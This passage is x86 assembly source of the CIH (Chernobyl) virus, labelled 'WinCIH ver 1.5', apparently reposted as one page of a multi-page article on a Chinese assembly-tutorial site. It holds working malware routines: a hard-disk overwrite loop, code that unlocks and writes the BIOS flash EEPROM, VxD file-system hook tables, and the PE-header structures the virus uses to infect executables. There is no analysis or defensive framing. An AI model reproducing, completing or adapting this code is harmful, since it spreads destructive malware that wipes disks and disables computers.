jmp LoopOfKillHardDisk
KillNextDataSection:
add dword ptr [esi 10h], ebx
mov byte ptr [esi 4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
; ***************************
逆@风@者
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
; ***************************
; * IO for EEPROM *
; ***************************
IOForEEPROM:
@10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
ret
; *********************************************************
; * Static Data *
; *********************************************************
LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize = ($-VxDCallIDTable)/04h
; *********************************************************
; * Virus Version Copyright *
; *********************************************************
VirusVersionCopyright db 'WinCIH ver 1.5 by TATUNG, Thailand'
; *********************************************************
; * Virus Size *
; *********************************************************
VirusSize = $
; SizeOfVirusCodeSectionTableEndMark(04h)
; NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; SizeOfTheFirstVirusCodeSectionTable(04h)
; *********************************************************
; * Dynamic Data *
; *********************************************************
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy db 0
FileModificationTime dd ?
FileNameBuffer db FileNameBufferSize dup(?)
@7 = FileNameBuffer
DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ?
TimeDateStamp dd ?
SymbolsPointer dd ?
NumberOfSymbols dd ?
SizeOfOptionalHeader dw ?
_Characteristics dw ?
Magic dw ?
LinkerVersion dw ?
SizeOfCode dd ?
SizeOfInitializedData dd ?
SizeOfUninitializedData dd ?
AddressOfEntryPoint dd ?
BaseOfCode dd ?
BaseOfData dd ?
ImageBase dd ?
@9 = $
SectionAlignment dd ?
FileAlignment dd ?
OperatingSystemVersion dd ?
ImageVersion dd ?
SubsystemVersion dd ?
Reserved dd ?
SizeOfImage dd ?
SizeOfHeaders dd ?
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer ; DWORD
SizeOfImageHeaderToWrite= 04h
StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD
VirtualSize = StartOfSectionTable 08h ; DWORD
VirtualAddress = StartOfSectionTable 0ch ; DWORD
SizeOfRawData = StartOfSectionTable 10h ; DWORD
PointerToRawData = StartOfSectionTable 14h ; DWORD
PointerToRelocations = StartOfSectionTable 18h ; DWORD
PointerToLineNumbers = StartOfSectionTable 1ch ; DWORD
NumberOfRelocations = StartOfSectionTable 20h ; WORD
NumberOfLinenNmbers = StartOfSectionTable 22h ; WORD
Characteristics = StartOfSectionTable 24h ; DWORD
SizeOfScetionTable = Characteristics 04h-SectionName
; *********************************************************
; * Virus Total Need Memory *
本文章更多内容:<<上一页 - 1 - 2 - 3 - 4 - 5 - 6 - 7 - 8 - 9 - 10 - 11 - 12 - 下一页>> |
您的位置:逆风者
→ 汇编技术
→ 正文
本文章所属分类:首页
→ 汇编技术